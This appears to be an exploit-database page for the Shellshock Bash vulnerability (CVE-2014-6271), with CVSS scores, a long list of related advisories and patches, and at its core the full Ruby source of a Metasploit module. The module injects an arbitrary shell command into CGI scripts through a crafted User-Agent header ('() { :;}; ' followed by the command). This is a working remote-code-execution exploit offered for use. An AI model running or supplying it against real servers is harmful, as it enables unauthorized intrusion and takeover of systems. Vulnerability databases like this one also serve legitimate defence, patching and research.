Lucene search
Shaun ColleyEXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8HistorySep 25, 2014 - 12:00 a.m.
GNU Bash - Environment Variable Command Injection (Metasploit)
2014-09-2500:00:00
Shaun Colley
48
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
GNU Bash - Environment Variable Command Injection (Metasploit)
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'bashedCgi',
'Description' => %q{
Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Shaun Colley <scolley at ioactive.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [ 'CVE', '2014-6271' ],
'Targets' =>
[
[ 'cgi', {} ]
],
'DefaultTarget' => 0,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' => { 'PAYLOAD' => 0 }
))
register_options(
[
OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
], self.class)
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['TARGETURI'],
'agent' => "() { :;}; " + datastore['CMD']
})
if res && res.code == 200
print_good("Command sent - 200 received")
else
print_error("Command sent - non-200 reponse")
end
end
endRelated
exploitpack
exploitpack
Cisco Unified Communications Manager - Multiple Vulnerabilities
2015-08-18 00:00:00
OpenVPN 2.2.29 - Shellshock Remote Command Injection
2014-10-04 00:00:00
RedStar 3.0 Server - Shellshock BEAM RSSMON Command Injection
2016-12-18 00:00:00
zdt
zdt
Bash Environment Variables Code Injection Exploit
2014-09-25 00:00:00
Advantech Switch Bash Environment Variable Code Injection Exploit
2015-12-02 00:00:00
IPFire - Bash Environment Variable Injection (Shellshock)
2016-06-10 00:00:00
saint
saint
Bash environment variable code injection over HTTP
2014-09-26 00:00:00
ShellShock DHCP Server
2014-11-20 00:00:00
Bash environment variable code injection over HTTP
2014-09-26 00:00:00
nessus
nessus
CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)
2014-09-25 00:00:00
SIP Script Remote Command Execution via Shellshock
2014-11-03 00:00:00
Oracle Linux 4 : bash (ELSA-2014-1294) (Shellshock)
2014-09-25 00:00:00
redhat
redhat
(RHSA-2014:1295) Critical: bash Shift_JIS security update
2014-09-24 00:00:00
(RHSA-2014:1294) Critical: bash security update
2014-09-24 00:00:00
(RHSA-2014:1293) Critical: bash security update
2014-09-24 00:00:00
debian
debian
[SECURITY] [DSA 3032-1] bash security update
2014-09-24 14:06:06
[SECURITY] [email protected]
2014-09-24 15:22:27
[SECURITY] [email protected]
2014-09-24 15:22:47
packetstorm
packetstorm
Cisco Unified Communications Manager Command Execution
2015-08-13 00:00:00
FutureNet NXR-G240 Series ShellShock Command Injection
2018-12-07 00:00:00
Pure-FTPd External Authentication Bash Environment Variable Code Injection
2014-10-02 00:00:00
thn
thn
exploitdb
exploitdb
openvas
openvas
Debian Security Advisory DSA 3032-1 (bash - security update)
2014-09-24 00:00:00
Debian: Security Advisory (DLA-59-1)
2023-03-08 00:00:00
CentOS Update for bash CESA-2014:1293 centos6
2014-09-25 00:00:00
suse
suse
bash (critical)
2014-09-30 17:06:26
Security update for bash (critical)
2014-09-27 01:04:16
securityvulns
securityvulns
Re: [oss-security] CVE-2014-6271: remote code execution through bash
2014-09-25 00:00:00
Cisco Unified Communications Manager Multiple Vulnerabilities (VP2015-001)
2015-08-17 00:00:00
Re: [oss-security] CVE-2014-6271: remote code execution through bash
2014-09-25 00:00:00
oraclelinux
oraclelinux
bash security update
2014-09-24 00:00:00
bash security update
2014-09-24 00:00:00
hackerone
hackerone
myhack58
myhack58
gentoo
gentoo
Bash: Code Injection
2014-09-24 00:00:00
Bash: Code Injection (Updated fix for GLSA 201409-09)
2014-09-25 00:00:00
amazon
amazon
Critical: bash
2014-09-24 07:48:00
seebug
seebug
IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit
2014-10-10 00:00:00
GNU bash Environment Variable Command Injection (MSF)
2014-09-29 00:00:00
OpenVPN 2.2.29 - ShellShock Exploit
2014-10-10 00:00:00
fedora
fedora
[SECURITY] Fedora 21 Update: bash-4.3.22-3.fc21
2014-09-27 10:03:24
[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
2014-09-26 09:00:48
[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
2014-09-26 09:03:00
centos
centos
bash security update
2014-09-24 15:07:20
slackware
slackware
[slackware-security] bash
2014-09-29 19:33:36
[slackware-security] bash
2014-09-24 23:37:00
cisa_kev
cisa_kev
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
metasploit
metasploit
IPFire Bash Environment Variable Injection (Shellshock)
2016-05-30 00:40:12
Advantech Switch Bash Environment Variable Code Injection (Shellshock)
2015-12-01 17:33:45
ubuntu
ubuntu
Bash vulnerability
2014-09-24 00:00:00
osv
osv
bash - security update
2014-09-24 00:00:00
threatpost
threatpost
Patching Bash Vulnerability a Challenge for ICS, SCADA
2014-09-25 14:34:38
Bash Vulnerability Exploits Dropping DDoS Bots
2014-09-25 16:30:59
Bash Botnet Exploit Found, Bash Patches Incomplete
2014-09-25 11:41:51
kitploit
kitploit
xShock - Shellshock Exploit
2020-03-19 11:30:00
mageia
mageia
Updated bash packages fix CVE-2014-6271
2014-09-24 22:42:05
Updated bash packages fix CVE-2014-7169
2014-09-28 16:17:31
checkpoint_security
checkpoint_security
debiancve
debiancve
CVE-2014-6271
2014-09-24 18:48:00
CVE-2014-7169
2014-09-25 01:55:00
paloalto
paloalto
Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
2014-09-24 00:00:00
prion
prion
Design/Logic Flaw
2014-09-25 01:55:00
Design/Logic Flaw
2014-09-24 18:48:00
Design/Logic Flaw
2015-01-13 11:59:00
symantec
symantec
GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability
2014-09-24 00:00:00
veracode
veracode
Remote Code Execution (RCE)
2019-01-15 09:01:57
ics
ics
Bash Command Injection Vulnerability (Update A)
2018-09-06 12:00:00
cve
cve
CVE-2014-7169
2014-09-25 01:55:00
attackerkb
attackerkb
CVE-2014-7169
2014-09-25 00:00:00
freebsd
freebsd
bash -- remote code execution vulnerability
2014-09-24 00:00:00
impervablog
impervablog
Log4j: One Year Later
2022-12-09 12:38:39
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
Related for EXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8